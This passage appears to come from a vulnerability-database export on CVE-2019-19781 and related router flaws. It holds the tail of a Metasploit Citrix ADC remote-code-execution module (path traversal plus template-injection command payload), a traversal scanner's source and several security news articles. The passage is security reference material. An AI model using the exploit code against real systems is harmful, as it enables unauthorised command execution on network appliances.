vprint_status(\"Generated payload: #{payload.encoded}\")\n\n case target['Type']\n when :python\n execute_command(%(/var/python/bin/python2 -c \"#{payload.encoded}\"))\n when :unix_cmd\n if (res = execute_command(payload.encoded)) && cmd_unix_generic?\n print_line(res.get_html_document.text.gsub(/undef error - Attempt to bless.*/m, ''))\n end\n end\n end\n\n def execute_command(cmd, _opts = {})\n filename = rand_text_alpha(8..42)\n nonce = rand_text_alpha(8..42)\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/vpn/../vpns/portal/scripts/newbm.pl'),\n 'headers' => {\n 'NSC_USER' => \"../../../netscaler/portal/templates/#{filename}\",\n 'NSC_NONCE' => nonce\n },\n 'vars_post' => {\n 'url' => rand_text_alpha(8..42),\n 'title' => \"[%template.new({'BLOCK'='print readpipe(#{chr_payload(cmd)})'})%]\"\n }\n )\n\n unless res && res.code == 200\n print_error('No response to POST newbm.pl request')\n return\n end\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, \"/vpn/../vpns/portal/#{filename}.xml\"),\n 'headers' => {\n 'NSC_USER' => rand_text_alpha(8..42),\n 'NSC_NONCE' => nonce\n },\n 'partial' => true\n )\n\n unless res && res.code == 200\n print_warning(\"No response to GET #{filename}.xml request\")\n end\n\n register_files_for_cleanup(\n \"/netscaler/portal/templates/#{filename}.xml\",\n \"/var/tmp/netscaler/portal/templates/#{filename}.xml.ttc2\"\n )\n\n res\n end\n\n def chr_payload(cmd)\n cmd.each_char.map { |c| \"chr(#{c.ord})\" }.join('.')\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/freebsd/http/citrix_dir_traversal_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-24T08:41:59", "description": "This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of a \"[global]\" directive in smb.conf, which this file should always contain.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-13T22:39:05", "type": "metasploit", "title": "Citrix ADC (NetScaler) Directory Traversal Scanner", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-02-16T23:22:40", "id": "MSF:AUXILIARY-SCANNER-HTTP-CITRIX_DIR_TRAVERSAL-", "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/http/citrix_dir_traversal/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Citrix ADC (NetScaler) Directory Traversal Scanner',\n 'Description' => %{\n This module exploits a directory traversal vulnerability (CVE-2019-19781) within Citrix ADC\n (NetScaler). It requests the smb.conf file located in the /vpns/cfg directory by issuing the request\n /vpn/../vpns/cfg/smb.conf. It then checks if the server is vulnerable by looking for the presence of\n a \"[global]\" directive in smb.conf, which this file should always contain.\n },\n 'Author' => [\n 'Mikhail Klyuchnikov', # Discovery\n 'Erik Wynter', # Module (@wyntererik)\n 'altonjx' # Module (@altonjx)\n ],\n 'References' => [\n ['CVE', '2019-19781'],\n ['URL', 'https://web.archive.org/web/20200111095223/https://support.citrix.com/article/CTX267027/'],\n ['URL', 'https://swarm.ptsecurity.com/remote-code-execution-in-citrix-adc/']\n ],\n 'DisclosureDate' => '2019-12-17',\n 'License' => MSF_LICENSE,\n 'Notes' => {\n 'AKA' => ['Shitrix']\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('PATH', [true, 'Traversal path', '/vpn/../vpns/cfg/smb.conf'])\n ])\n end\n\n def run_host(target_host)\n turi = normalize_uri(target_uri.path, datastore['PATH'])\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => turi\n )\n\n unless res\n print_error(\"#{full_uri(turi)} - No response, target seems down.\")\n\n return Exploit::CheckCode::Unknown\n end\n\n unless res.code == 200\n print_error(\"#{full_uri(turi)} - The target is not vulnerable to CVE-2019-19781.\")\n vprint_error(\"Obtained HTTP response code #{res.code} for #{full_uri(turi)}.\")\n\n return Exploit::CheckCode::Safe\n end\n\n if turi.end_with?('smb.conf')\n unless res.headers['Content-Type'].starts_with?('text/plain') && res.body.match(/\\[\\s*global\\s*\\]/)\n vprint_warning(\"#{turi} does not contain \\\"[global]\\\" directive.\")\n end\n end\n\n print_good(\"#{full_uri(turi)} - The target is vulnerable to CVE-2019-19781.\")\n msg = \"Obtained HTTP response code #{res.code} for #{full_uri(turi)}. \" \\\n \"This means that access to #{turi} was obtained via directory traversal.\"\n vprint_good(msg)\n\n report_vuln(\n host: target_host,\n name: name,\n refs: references,\n info: msg\n )\n\n Exploit::CheckCode::Vulnerable\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/citrix_dir_traversal.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:02", "description": "[![hacking cisco routers ](https://thehackernews.com/images/-XOZnlffGMP8/XE7nbFKrD-I/AAAAAAAAzKw/AdK-1PkPXhYWGCDD3VJTTez6LvgSa1uuACLcBGAs/s728-e100/hacking-cisco-routers.jpg)](<https://thehackernews.com/images/-XOZnlffGMP8/XE7nbFKrD-I/AAAAAAAAzKw/AdK-1PkPXhYWGCDD3VJTTez6LvgSa1uuACLcBGAs/s728-e100/hacking-cisco-routers.jpg>)\n\nIf the connectivity and security of your organization rely on Cisco RV320 or RV325 Dual Gigabit WAN VPN routers, then you need to immediately install the latest firmware update released by the vendor last week. \n \nCyber attackers have actively been exploiting two newly patched high-severity router vulnerabilities in the wild after a security researcher released their [proof-of-concept exploit](<https://github.com/0x27/CiscoRV320Dump>) code on the Internet last weekend. \n \nThe vulnerabilities in question are a command injection flaw (assigned CVE-2019-1652) and an information disclosure flaw (assigned CVE-2019-1653), a combination of which could allow a remote attacker to take full control of an affected Cisco router. \n \nThe first issue exists in RV320 and RV325 dual gigabit WAN VPN routers running firmware versions 1.4.2.15 through 1.4.2.19, and the second affects firmware versions 1.4.2.15 and 1.4.2.17, according to the [Cisco's advisory](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>). \n \nBoth the vulnerabilities, discovered and responsibly reported to the company by German security firm RedTeam Pentesting, actually resides in the web-based management interface used for the routers and are remotely exploitable. \n \n\n\n * CVE-2019-1652\u2014The flaw allows an authenticated, remote attacker with administrative privileges on an affected device to execute arbitrary commands on the system.\n * CVE-2019-1653\u2014This flaw doesn't require any authentication to reach the router's web-based management portal, allowing attackers to retrieve sensitive information including the router's configuration file containing MD5 hashed credentials and diagnostic information.\n \nThe PoC exploit code targeting Cisco RV320/RV325 routers published on the Internet first exploits CVE-2019-1653 to retrieve the configuration file from the router to obtain its hashed credentials and then exploits CVE-2019-1652 to execute arbitrary commands and gain complete control of the affected device. \n \nResearchers from cybersecurity firm [Bad Packets](<https://badpackets.net/over-9000-cisco-rv320-rv325-routers-vulnerable-to-cve-2019-1653/>) said they found at least 9,657 Cisco routers (6,247 RV320 and 3,410 RV325) worldwide that are vulnerable to the information disclosure vulnerability, most of which located in the United States. \n \nThe firm shared an [interactive map](<https://docs.google.com/spreadsheets/d/1ZocV8n4DOmcKJ_ugjjQ_gjIAmDHxT1JBhVxIAdABVyY/edit#gid=1297196434>), showing all vulnerable RV320/RV325 Cisco routers in 122 countries and on the network of 1,619 unique internet service providers. \n \nBad Packets said its honeypots detected opportunistic scanning activity for vulnerable routers from multiple hosts from Saturday, suggesting the hackers are actively trying to exploit the flaws to take full control of the vulnerable routers. \n \nThe best way to protect yourself from becoming the target of one such attack is to install the latest Cisco RV320 and RV325 [Firmware release 1.4.2.20](<https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20?catid=268437899>) as soon as possible. \n \nAdministrators who have not yet applied the firmware update are highly recommended to change their router's admin and WiFi credentials considering themselves already compromised. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-01-28T11:31:00", "type": "thn", "title": "New Exploit Threatens Over 9,000 Hackable Cisco RV320/RV325 Routers Worldwide", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-01-28T11:31:47", "id": "THN:F4C5F017FE55E40DF427E75D001F7D91", "href": "https://thehackernews.com/2019/01/hacking-cisco-routers.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:40:08", "description": "[![ransomware attack on hospitals](https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728-e1000/ransomware-attack-on-hospital.jpg)](<https://thehackernews.com/images/-YFnAQDBLWlw/X2h9bFB25hI/AAAAAAAAAyE/jMecIXHH_sMcXYoQN-b9qTiy868SAREGgCLcBGAsYHQ/s728/ransomware-attack-on-hospital.jpg>)\n\n \nGerman authorities last week [disclosed](<https://apnews.com/cf8f8eee1adcec69bcc864f2c4308c94>) that a ransomware attack on the University Hospital of D\u00fcsseldorf (UKD) caused a failure of IT systems, resulting in the death of a woman who had to be sent to another hospital that was 20 miles away.\n\nThe incident marks the first recorded casualty as a consequence of cyberattacks on critical healthcare facilities, which has ramped up in recent months.\n\nThe attack, which exploited a Citrix ADC [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) vulnerability to cripple the hospital systems on September 10, is said to have been \"misdirected\" in that it was originally intended for Heinrich Heine University, according to an extortion note left by the perpetrators.\n\nAfter law enforcement contacted the threat actors and informed them that they had encrypted a hospital, the operators behind the attack withdrew the ransom demand and provided the decryption key.\n\nThe case is currently being treated as a homicide, BBC News [reported](<https://www.bbc.com/news/technology-54204356>) over the weekend.\n\n### Unpatched Vulnerabilities Become Gateway to Ransomware Attacks\n\nAlthough several ransomware gangs said early on in the pandemic that they would not deliberately [target hospitals or medical facilities](<https://thehackernews.com/2016/11/hospital-cyber-attack-virus.html>), the recurring attacks [prompted the Interpol](<https://thehackernews.com/2020/04/cronavirus-hackers.html>) to issue a warning cautioning hospitals against ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments.\n\nWeak credentials and VPN vulnerabilities have proven to be a blessing in disguise for threat actors to break into the internal networks of businesses and organizations, leading cybersecurity agencies in the U.S. and U.K. to publish [multiple](<https://thehackernews.com/2020/09/iranian-hackers-sanctioned.html>) [advisories](<https://www.ncsc.gov.uk/news/citrix-alert>) about active exploitation of the flaws.\n\n\"The [Federal Office for Information Security] is becoming increasingly aware of incidents in which Citrix systems were compromised before the security updates that were made available in January 2020 were installed,\" the German cybersecurity agency [said](<https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldorf_170920.html>) in an alert last week.\n\n\"This means that attackers still have access to the system and the networks behind it even after the security gap has been closed. This possibility is currently increasingly being used to carry out attacks on affected organizations.\"\n\nThe development also coincides with a fresh [advisory](<https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector>) from the U.K. National Cyber Security Centre (NCSC), which said it's observed an uptick in ransomware incidents targeting educational institutions at least since August 2020, while urging schools and universities to implement a \"defence in depth\" strategy to defend against such malware attacks.\n\nSome of the affected institutions included [Newcastle](<https://www.ncl.ac.uk/itservice/latest-news/>) and [Northumbria](<https://www.bbc.com/news/uk-england-tyne-53989404>) Universities, among others.\n\nCiting Remote Desktop Protocol (RDP), vulnerable software or hardware, and email phishing as the three most common infection vectors, the agency [recommended](<https://blog.emsisoft.com/en/36921/8-critical-steps-to-take-after-a-ransomware-attack-ransomware-response-guide-for-businesses/>) organizations to maintain up-to-date offline backups, adopt endpoint malware protection, secure RDP services using multi-factor authentication, and have an effective patch management strategy in place.\n\n### A Spike in Ransomware Infections\n\nIf anything, the ransomware crisis seems to be only getting worse. [Historical data](<https://sites.temple.edu/care/ci-rw-attacks/>) gathered by Temple University's CARE cybersecurity lab has shown that there have been a total of 687 publicly disclosed cases in the U.S. since 2013, with 2019 and 2020 alone accounting for more than half of all reported incidents (440).\n\nGovernment facilities, educational institutions, and healthcare organizations are the most frequently hit sectors, as per the analysis.\n\nAnd if 2020 is any indication, attacks against colleges and universities are showing no signs of slowing down.\n\n[![](https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg)](<https://thehackernews.com/images/-w1AP-pVwnR0/X2h7szFvYJI/AAAAAAAAAx4/R2M_VI5F2gUCV9Dq0WYitww8OQ_Uz2P1gCLcBGAsYHQ/s0/ransomware-malware-attack-on-universities.jpg>)\n\nAllan Liska, a threat intelligence analyst at Recorded Future, revealed there had been at least 80 publicly reported ransomware infections targeting the education sector to date this year, a massive jump from 43 ransomware attacks for the whole of 2019.\n\n\"Part of this change can be attributed to extortion sites, which force more victims to announce attacks,\" Liska said in a [tweet](<https://twitter.com/uuallan/status/1307684719593746432>). \"But, in general, ransomware actors have more interest in going after colleges and universities, and they are often easy targets.\"\n\nYou can read more about NCSC's mitigation measures [here](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>). For more guidance on proofing businesses against ransomware attacks, head to US Cybersecurity Security and Infrastructure Security Agency's response guide [here](<https://us-cert.cisa.gov/security-publications/Ransomware>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-21T10:20:00", "type": "thn", "title": "A Patient Dies After Ransomware Attack Paralyzes German Hospital Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-09-21T10:34:14", "id": "THN:EB3F9784BB2A52721953F128D1B3EAEC", "href": "https://thehackernews.com/2020/09/a-patient-dies-after-ransomware-attack.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:52", "description": "[![Citrix ADC Vulnerability](https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg)](<https://thehackernews.com/images/-C3dSDFvJiqA/XiW3-49gerI/AAAAAAAABUA/ZZoejAM3OJUPzdMEoE_ef-Wyi7-BtaokACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway-hacking.jpg>)\n\nCitrix has finally started rolling out security patches for a critical [vulnerability in ADC and Gateway](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>) software that attackers started exploiting in the wild earlier this month after the company announced the existence of the issue without releasing any permanent fix. \n \nI wish I could say, \"better late than never,\" but since hackers don't waste time or miss any opportunity to exploit vulnerable systems, even a short window of time resulted in the compromise of hundreds of Internet exposed Citrix ADC and Gateway systems. \n \nAs explained earlier on The Hacker News, the vulnerability, tracked as **CVE-2019-19781**, is a path traversal issue that could allow unauthenticated remote attackers to execute arbitrary code on several versions of Citrix ADC and Gateway products, as well as on the two older versions of Citrix SD-WAN WANOP. \n \nRated critical with CVSS v3.1 base score 9.8, the issue was discovered by Mikhail Klyuchnikov, a security researcher at Positive Technologies, who responsibly reported it to Citrix in early December. \n \nThe vulnerability is actively being exploited in the wild since last week by dozens of hacking groups and individual attackers\u2014thanks to the public release of multiple [proofs-of-concept exploit code](<https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html>). \n \nAccording to cyber security [experts](<https://twitter.com/0xDUDE/status/1218988914272362496?s=08>), as of today, there are over 15,000 publicly accessible vulnerable Citrix ADC and Gateway servers that attackers can exploit overnight to target potential enterprise networks. \n \nFireEye experts found an attack campaign where someone was compromising vulnerable Citrix ADCs to install a previously-unseen payload, dubbed \"[NotRobin](<https://www.fireeye.com/blog/threat-research/2020/01/vigilante-deploying-mitigation-for-citrix-netscaler-vulnerability-while-maintaining-backdoor.html>),\" that scans systems for cryptominers and malware deployed by other potential attackers and removes them to maintain exclusive backdoor access. \n \n\n\n> [#Citrix](<https://twitter.com/hashtag/Citrix?src=hash&ref_src=twsrc%5Etfw>) released a free tool that analyzes available log sources and system forensic artifacts to identify whether an ADC appliance has potentially been compromised using CVE-2019-19781 security flaw. \n \nYou can find the tool and instructions here: <https://t.co/eewijzI2l9>[#infosec](<https://twitter.com/hashtag/infosec?src=hash&ref_src=twsrc%5Etfw>) <https://t.co/YKMwgPzmYE>\n> \n> \u2014 The Hacker News (@TheHackersNews) [January 22, 2020](<https://twitter.com/TheHackersNews/status/1219994163581554689?ref_src=twsrc%5Etfw>)\n\n \n \n\"This actor exploits NetScaler devices using CVE-2019-19781 to execute shell commands on the compromised device,\" FireEye said. \n \n\"FireEye believes that the actor behind NOTROBIN has been opportunistically compromising NetScaler devices, possibly to prepare for an upcoming campaign. They remove other known malware, potentially to avoid detection by administrators.\" \n \n\n\n## Citrix Patch Timeline: Stay Tuned for More Software Updates!\n\n \nLast week Citrix [announced a timeline](<https://twitter.com/TheHackersNews/status/1216239812249702401>), promising to release patched firmware updates for all supported versions of ADC and Gateway software before the end of January 2020, as shown in the chart. \n\n\n[![Citrix ADC and Gateway Software](https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg)](<https://thehackernews.com/images/-GFKY1pukwgU/XiWsvTjWRzI/AAAAAAAABT0/6B9St94Mff0LZyZw6yzG2oMefLn6gMgGACLcBGAsYHQ/s728-e100/Citrix-ADC-Gateway.jpg>)\n\nAs part of its [first batch of updates](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>), Citrix today released permanent patches for ADC versions 11.1 and 12.0 that also apply to \"ADC and Gateway VPX hosted on ESX, Hyper-V, KVM, XenServer, Azure, AWS, GCP or on a Citrix ADC Service Delivery Appliance (SDX).\" \n \n\"It is necessary to upgrade all Citrix ADC and Citrix Gateway 11.1 instances (MPX or VPX) to build 11.1.63.15 to install the security vulnerability fixes. It is necessary to upgrade all Citrix ADC and Citrix Gateway 12.0 instances (MPX or VPX) to build 12.0.63.13 to install the security vulnerability fixes,\" Citrix said in its advisory. \n \n\"We urge customers to install these fixes immediately,\" the company said. \"If you have not already done so, you need to apply the previously supplied mitigation to ADC versions 12.1, 13, 10.5, and SD-WAN WANOP versions 10.2.6 and 11.0.3 until the fixes for those versions are available.\" \n \nThe company also warned that customers with multiple ADC versions in production must apply the correct version of patch to each system separately. \n \nBesides installing available patches for supported versions and applying the recommended mitigation for unpatched systems, Citrix ADC administrators are also advised to monitor their device logs for attacks. \n \n**UPDATE \u2014 **Citrix on Thursday also released [second batch of permanent security patches](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>) for critical RCE vulnerability affecting ADC and Gateway versions 12.1 and 13.0.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-20T14:24:00", "type": "thn", "title": "Citrix Releases Patches for Critical ADC Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-24T07:05:37", "id": "THN:166AAAF7F04EF01C9E049500387BD1FD", "href": "https://thehackernews.com/2020/01/citrix-adc-patch-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:53", "description": "[![citrix adc and gateway vulnerability](https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg)](<https://thehackernews.com/images/-_9-nocA92TI/XhmeU1ZwSqI/AAAAAAAA2KQ/m0YexAlFrVQzvw1H2fYT8uoiFY33g82DQCLcBGAsYHQ/s728-e100/citrix-adc-gateway-vulnerability.jpg>)\n\nIt's now or never to prevent your enterprise servers running vulnerable versions of Citrix application delivery, load balancing, and Gateway solutions from getting hacked by remote attackers. \n \nWhy the urgency? Earlier today, multiple groups publicly released weaponized proof-of-concept exploit code [[1](<https://github.com/trustedsec/cve-2019-19781>), [2](<https://github.com/projectzeroindia/CVE-2019-19781>)] for a recently disclosed remote code execution vulnerability in Citrix's NetScaler ADC and Gateway products that could allow anyone to leverage them to take full control over potential enterprise targets. \n \nJust before the last Christmas and year-end holidays, Citrix [announced](<https://support.citrix.com/article/CTX267027>) that its Citrix Application Delivery Controller (ADC) and Citrix Gateway are vulnerable to a critical path traversal flaw (CVE-2019-19781) that could allow an unauthenticated attacker to perform arbitrary code execution on vulnerable servers. \n \nCitrix confirmed that the flaw affects all supported version of the software, including: \n \n\n\n * Citrix ADC and Citrix Gateway version 13.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.1 all supported builds\n * Citrix ADC and NetScaler Gateway version 12.0 all supported builds\n * Citrix ADC and NetScaler Gateway version 11.1 all supported builds\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 all supported builds\n \nThe company made the disclose without releasing any security patches for vulnerable software; instead, [Citrix offered mitigation](<https://support.citrix.com/article/CTX267679>) to help administrators guard their servers against potential remote attacks\u2060\u2014and even at the time of writing, there's no patch available almost 23 days after disclosure. \n \n\n\n \nThrough the cyberattacks against vulnerable servers were [first seen in the wild](<https://twitter.com/sans_isc/status/1213228049011007489>) last week when hackers developed private exploit after reverse engineering mitigation information, the public release of weaponized PoC would now make it easier for low-skilled script kiddies to launch cyberattacks against vulnerable organizations. \n \nAccording to [Shodan](<https://beta.shodan.io/search/facet?query=http.waf%3A%22Citrix+NetScaler%22&facet=org>), at the time of writing, there are over 125,400 Citrix ADC or Gateway servers publicly accessible and can be exploited overnight if not taken offline or protected using available mitigation. \n \nWhile discussing [technical details](<https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/>) of the flaw in a blog post published yesterday, MDSsec also released a video demonstration of the exploit they developed but chose not to release it at this moment. \n \nBesides applying the recommended mitigation, Citrix ADC administrators are also advised to monitor their device logs for attacks.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-01-11T10:21:00", "type": "thn", "title": "PoC Exploits Released for Citrix ADC and Gateway RCE Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-11T10:22:37", "id": "THN:6ED39786EE29904C7E93F7A0E35A39CB", "href": "https://thehackernews.com/2020/01/citrix-adc-gateway-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:15", "description": "[![citrix software](https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg)](<https://thehackernews.com/images/-YFgpJhs_wIc/XwV5FgvOBvI/AAAAAAAAAi0/I-4cCa2dIG4SoMiPExrAAoVmPOMt6TE-ACLcBGAsYHQ/s728-e100/citrix-software.jpg>)\n\nCitrix yesterday issued new security patches for as many as [11 security flaws](<https://www.citrix.com/blogs/2020/07/07/citrix-provides-context-on-security-bulletin-ctx276688/>) that affect its Citrix Application Delivery Controller (ADC), Gateway, and SD-WAN WAN Optimization edition (WANOP) networking products. \n \nSuccessful exploitation of these critical flaws could let unauthenticated attackers perform code injection, information disclosure, and even denial-of-service attacks against the gateway or the [authentication virtual servers](<https://docs.citrix.com/en-us/netscaler/12/aaa-tm/authentication-virtual-server.html>). \n \nCitrix confirmed that the aforementioned issues do not impact other virtual servers, such as load balancing and content switching virtual servers. \n \nAmong the affected Citrix SD-WAN WANOP appliances include models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. \n \nThe networking vendor also reiterated that these vulnerabilities were not connected to a previously fixed [zero-day NetScaler 